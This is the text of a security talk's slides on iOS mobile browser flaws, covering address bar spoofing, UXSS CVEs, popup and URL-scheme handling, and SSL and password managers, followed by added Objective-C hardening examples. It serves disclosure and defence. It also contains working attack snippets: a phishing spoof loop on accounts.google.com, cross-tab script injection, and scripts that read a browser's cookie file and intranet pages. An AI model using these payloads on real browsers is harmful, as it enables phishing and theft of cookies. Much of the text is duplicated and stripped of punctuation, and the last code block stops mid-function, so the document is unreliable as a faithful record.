Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing: Failed Navigation

Failed Navigation
Incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN - host not found (https://login.target.tld/)
• TCP port closed (https://www.target.tld:448/)
• SSL errors (https://target.tld/)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing error alerts

Address Bar Spoofing: Loading loop

Loading loop
• HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443/'; setInterval(function() { location = 'https://accounts.google.com:8443/' }, …)

Title bar
• Phishing page: <title>https://www.apple.com/</title> shown in the title bar

Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying the SSL lock makes sense only if there was an actual successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
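An added example of the address bar tips above, written in Objective-C for this page and not taken from the slides or from any browser named here: a UIWebViewDelegate that refreshes the address bar from the web view's own state on every event and shows the lock only after a finished, error-free https load, with the iOS 8 KVO path for WKWebView. BRSBrowserViewController, its labels and the hostsWithAcceptedInvalidCerts set are assumed names.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>   // WKWebView, iOS 8

@interface BRSBrowserViewController : UIViewController <UIWebViewDelegate>
@property (nonatomic, strong) UIWebView *webView;
@property (nonatomic, strong) WKWebView *wkWebView;       // iOS 8 path, may be nil
@property (nonatomic, strong) UILabel *addressLabel;     // address bar text
@property (nonatomic, strong) UILabel *titleLabel;       // document.title, shown separately
@property (nonatomic, strong) UIImageView *lockView;     // hidden unless a verified https load finished
@property (nonatomic, strong) NSMutableSet *hostsWithAcceptedInvalidCerts; // filled by the app's cert-exception UI (assumed)
@property (nonatomic, assign) BOOL observingWK;
@end

@implementation BRSBrowserViewController

// The one place that decides what the address bar shows. The URL is always
// webView.request.mainDocumentURL, i.e. what is really loaded in the view,
// never the URL that was typed or that a page tried to navigate to.
- (void)refreshAddressBarForWebView:(UIWebView *)webView finished:(BOOL)finished error:(NSError *)error {
    NSURL *url = webView.request.mainDocumentURL;
    NSString *text = url.absoluteString ?: @"";
    if (error != nil) {
        // Failed navigation (NXDOMAIN, closed port, SSL error): show the URL
        // actually in the view and flag the failure, instead of leaving the
        // attempted URL sitting in the bar.
        text = [text stringByAppendingString:@" (failed to load)"];
    } else if (!finished) {
        // Navigation attempt in progress: no connection has necessarily been
        // made yet (the loading-loop trick), so present the URL as pending.
        text = [text stringByAppendingString:@" (loading)"];
    }
    self.addressLabel.text = text;
    // Lock = completed, error-free load over https with a validated certificate.
    // A pending https URL, a failed https load, or a host for which the user
    // accepted an invalid certificate gets no lock.
    BOOL https = url.scheme != nil && [url.scheme caseInsensitiveCompare:@"https"] == NSOrderedSame;
    BOOL certException = url.host != nil && [self.hostsWithAcceptedInvalidCerts containsObject:url.host];
    self.lockView.hidden = !(finished && error == nil && https && !certException);
}

// document.title gets its own label and never stands in for the URL: a page
// can set <title>https://www.apple.com/</title>.
- (void)refreshTitleForWebView:(UIWebView *)webView {
    self.titleLabel.text = [webView stringByEvaluatingJavaScriptFromString:@"document.title"];
}

#pragma mark - UIWebViewDelegate: refresh on every event

- (BOOL)webView:(UIWebView *)webView shouldStartLoadWithRequest:(NSURLRequest *)request
 navigationType:(UIWebViewNavigationType)navigationType {
    return YES;   // nothing has loaded yet, so request.URL does not go into the bar here
}

- (void)webViewDidStartLoad:(UIWebView *)webView {
    [self refreshAddressBarForWebView:webView finished:NO error:nil];
}

- (void)webViewDidFinishLoad:(UIWebView *)webView {
    // Fires once per frame; isLoading is NO only after the last one.
    [self refreshAddressBarForWebView:webView finished:!webView.isLoading error:nil];
    [self refreshTitleForWebView:webView];
}

- (void)webView:(UIWebView *)webView didFailLoadWithError:(NSError *)error {
    // A load superseded by another navigation arrives as NSURLErrorCancelled;
    // the bar is still refreshed from the view, but that is not a failure.
    BOOL cancelled = [error.domain isEqualToString:NSURLErrorDomain] && error.code == NSURLErrorCancelled;
    [self refreshAddressBarForWebView:webView finished:!webView.isLoading error:cancelled ? nil : error];
}

#pragma mark - iOS 8: WKWebView exposes KVO-compliant URL and loading properties

- (void)startObservingWKWebView {
    [self.wkWebView addObserver:self forKeyPath:@"URL" options:NSKeyValueObservingOptionNew context:NULL];
    [self.wkWebView addObserver:self forKeyPath:@"loading" options:NSKeyValueObservingOptionNew context:NULL];
    self.observingWK = YES;
}

- (void)observeValueForKeyPath:(NSString *)keyPath ofObject:(id)object
                        change:(NSDictionary *)change context:(void *)context {
    if (object != self.wkWebView) {
        [super observeValueForKeyPath:keyPath ofObject:object change:change context:context];
        return;
    }
    NSURL *url = self.wkWebView.URL;                // the view's own state, mirrored directly
    NSString *text = url.absoluteString ?: @"";
    self.addressLabel.text = self.wkWebView.loading ? [text stringByAppendingString:@" (loading)"] : text;
    BOOL https = url.scheme != nil && [url.scheme caseInsensitiveCompare:@"https"] == NSOrderedSame;
    self.lockView.hidden = !(https && !self.wkWebView.loading && self.wkWebView.hasOnlySecureContent);
}

- (void)dealloc {
    if (!self.observingWK) return;
    [self.wkWebView removeObserver:self forKeyPath:@"URL"];
    [self.wkWebView removeObserver:self forKeyPath:@"loading"];
}

@end
```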
UXSS: Universal Cross-Site Scripting

Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy.
In UXSS the attacker exploits a vulnerability in the browser, not in the website.
(~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007

Universal Cross-Site Scripting
• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in YandexBrowser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• …

CVE-2013-6893: UXSS in Mercury Browser

CVE-2013-6893 Mercury UXSS
w = window.open('about:blank')
-> mbexec:$(WINDOW_ID)[ "command": "window.open", "target": 1234, "url": "about:blank" ]   ($(WINDOW_ID): Math.random())
-> [webView loadRequest: … "about:blank" …]
Cross-frame forgery

w.document.write('Hi')
-> mbexec:$(WINDOW_ID)[ "command": "window.document.write", "target": 1234, "html": "Hi" ]
-> [webView stringByEvaluatingJavaScriptFromString: "document.write('Hi')"]

Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com/'); w.document.write('<script src=…></script>')
…and it just works in accounts.google.com
CVE-2013-7197: UXSS in YandexBrowser

CVE-2013-7197 Yandex UXSS
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() -> UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome

CVE-2012-2899 Chrome UXSS
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>') -> applewebdata:// origin
• UXSS + local file access (application sandbox/jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:

Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com/%"] -> nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com/%"), NULL) -> NULL
• Downloads opened directly from file://
Content-Disposition: attachment
• Displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• Isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other; filename=.html -> HTML

JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
  alert(x.responseText);
}
</script>

<script>
x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send();
alert(x.responseText);
</script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
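An added Objective-C example of the "Opening local HTML files safely" options above; it is not code from the slides. BRSDownloadViewer and its method names are assumed, and the meta-delivered CSP assumes the WebKit build in use honours CSP supplied that way.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>   // WKWebView, iOS 8

@interface BRSDownloadViewer : NSObject
@end

@implementation BRSDownloadViewer

// Inert base for anything loaded from a file: the content gets no same-origin
// access to web origins or local files. Never pass baseURL:nil (that yields
// the applewebdata: origin).
+ (NSURL *)inertBaseURL {
    return [NSURL URLWithString:@"about:blank"];
}

// UIWebView, option 1: show the file as text/plain whatever the server's
// Content-Type or the file extension said, so markup is displayed, not run.
+ (void)showDownload:(NSURL *)fileURL asTextInWebView:(UIWebView *)webView {
    NSData *data = [NSData dataWithContentsOfURL:fileURL];
    if (data == nil) return;
    [webView loadData:data MIMEType:@"text/plain" textEncodingName:@"utf-8" baseURL:[self inertBaseURL]];
}

// UIWebView, option 2: render as HTML but prefix a CSP that forbids script,
// plugins and network fetches (assumes the WebKit build honours meta CSP).
+ (void)showDownload:(NSURL *)fileURL asRestrictedHTMLInWebView:(UIWebView *)webView {
    NSString *html = [NSString stringWithContentsOfURL:fileURL encoding:NSUTF8StringEncoding error:NULL];
    if (html == nil) return;
    NSString *csp = @"<meta http-equiv=\"Content-Security-Policy\" "
                     "content=\"default-src 'none'; img-src data:; style-src 'unsafe-inline'\">";
    [webView loadHTMLString:[csp stringByAppendingString:html] baseURL:[self inertBaseURL]];
}

// iOS 8: a WKWebView with JavaScript switched off in its configuration, used
// only for viewing downloads (the normal browsing view keeps its own config).
+ (WKWebView *)downloadViewerWithFrame:(CGRect)frame {
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    return [[WKWebView alloc] initWithFrame:frame configuration:config];
}

+ (void)showDownload:(NSURL *)fileURL inDownloadViewer:(WKWebView *)viewer {
    NSString *html = [NSString stringWithContentsOfURL:fileURL encoding:NSUTF8StringEncoding error:NULL];
    if (html == nil) return;
    [viewer loadHTMLString:html baseURL:[self inertBaseURL]];   // never the file: URL
}

@end
```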
Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com/">, <iframe src="merc://example.com/">, etc. bypass all popup blockers anyway…

URI schemes
• Registered (external), Application (bolted-on), Native (WebKit), Bridge (internal)
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c, etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
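An added Objective-C example serving both the "Safe cross-tab document.write" / "Other potential paths" slides in the UXSS section and the CFURL slide just above; it is not code from the slides or from any of the browsers named here. It shows the native side of a JavaScript bridge handling cross-tab window.open() and document.write(): the URL from page content is parsed and rejected on NULL before any CFURL or UIKit call sees it, the same-origin check is repeated at write time, and the written document gets an about:blank base rather than nil. BRSTab, BRSBridge, the method names and the opener/navigated bookkeeping are assumptions.

```objective-c
#import <UIKit/UIKit.h>
#import <CoreFoundation/CoreFoundation.h>

// One tab = one UIWebView. The delegate marks the tab as navigated once it
// has loaded anything other than about:blank.
@interface BRSTab : NSObject <UIWebViewDelegate>
@property (nonatomic, strong) UIWebView *webView;
@property (nonatomic, weak) BRSTab *opener;        // tab whose window.open() created this one
@property (nonatomic, assign) BOOL navigated;
@end

@implementation BRSTab
- (void)webViewDidStartLoad:(UIWebView *)webView {
    NSString *u = webView.request.mainDocumentURL.absoluteString;
    if (u != nil && ![u isEqualToString:@"about:blank"]) self.navigated = YES;
}
@end

// Parse a URL string received from page JavaScript. For input such as
// "http://%5c" CFURLCreateWithString returns NULL (NSURL returns nil); that
// result is rejected here so it never reaches a CFURL* function, loadRequest:,
// or a baseURL: argument (nil baseURL means the applewebdata: origin).
static NSURL *BRSParseWebURL(NSString *string) {
    if (string.length == 0) return nil;
    CFURLRef cf = CFURLCreateWithString(kCFAllocatorDefault, (__bridge CFStringRef)string, NULL);
    if (cf == NULL) return nil;                     // CFURLCopyPath(NULL) would crash
    NSURL *url = CFBridgingRelease(cf);
    NSString *scheme = url.scheme.lowercaseString;
    // Page content may only open web origins: no file:, applewebdata:, bridge
    // or third-party app schemes.
    if (![scheme isEqualToString:@"http"] && ![scheme isEqualToString:@"https"]) return nil;
    return url.host.length > 0 ? url : nil;
}

// scheme://host:port of what is loaded in a tab right now, or nil when the tab
// holds no web origin (never loaded, about:blank, applewebdata:, file:).
static NSString *BRSOriginOfTab(BRSTab *tab) {
    NSURL *url = tab.webView.request.mainDocumentURL;
    NSString *scheme = url.scheme.lowercaseString;
    if (url == nil || url.host.length == 0) return nil;
    if (![scheme isEqualToString:@"http"] && ![scheme isEqualToString:@"https"]) return nil;
    NSNumber *port = url.port ?: @([scheme isEqualToString:@"https"] ? 443 : 80);
    return [NSString stringWithFormat:@"%@://%@:%@", scheme, url.host.lowercaseString, port];
}

@interface BRSBridge : NSObject
- (BRSTab *)tab:(BRSTab *)source windowOpen:(NSString *)urlString;
- (BOOL)tab:(BRSTab *)source documentWriteInTab:(BRSTab *)target html:(NSString *)html;
@end

@implementation BRSBridge

// Native side of w = window.open(url) issued from `source`.
- (BRSTab *)tab:(BRSTab *)source windowOpen:(NSString *)urlString {
    BRSTab *tab = [[BRSTab alloc] init];
    tab.webView = [[UIWebView alloc] initWithFrame:CGRectZero];
    tab.webView.delegate = tab;
    tab.opener = source;
    if ([urlString isEqualToString:@"about:blank"]) return tab;   // stays owned by its opener
    NSURL *url = BRSParseWebURL(urlString);
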